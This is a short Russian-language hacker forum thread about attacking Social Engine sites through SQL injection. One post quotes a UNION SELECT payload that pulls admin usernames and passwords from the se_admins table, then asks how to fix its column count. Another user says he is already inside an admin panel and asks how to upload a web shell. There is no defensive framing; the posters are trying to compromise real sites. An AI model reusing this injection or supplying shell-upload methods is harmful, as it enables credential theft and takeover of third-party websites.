Social Engine SQL инекция !

Discussion in 'Веб-уязвимости' started by eworld.uz, 18 Jan 2009.

  1. c0m

    c0m Elder - Старейшина

    Joined:
    26 Jan 2007
    Messages:
    37
    Likes Received:
    3
    Reputations:
    0
    сейчас такая же проблема

    Code:
    The used SELECT statements have a different number of columns SQL was: SELECT NULL FROM se_blogentries WHERE blogentry_user_id='965' AND (blogentry_privacy & '8') && blogentry_blogentrycat_id=-21 UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18 from se_admins/*
     
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Берем дружно книжечку по англ. языку и переводим:
    Это значит
     
  3. c0m

    c0m Elder - Старейшина

    Joined:
    26 Jan 2007
    Messages:
    37
    Likes Received:
    3
    Reputations:
    0
    mailbrush
    да я понял,
    подобрать так и не получилось
     
  4. LordNikon

    LordNikon New Member

    Joined:
    2 Apr 2007
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    Ребят я в админке, кто нибудь решил проблему с заливкой шелла?
    И еще вопрос, кто знает какие способы заливки шелов, через картинки, через урлы или еще как. Или ткните меня пожалуйста носом где говорится об этом.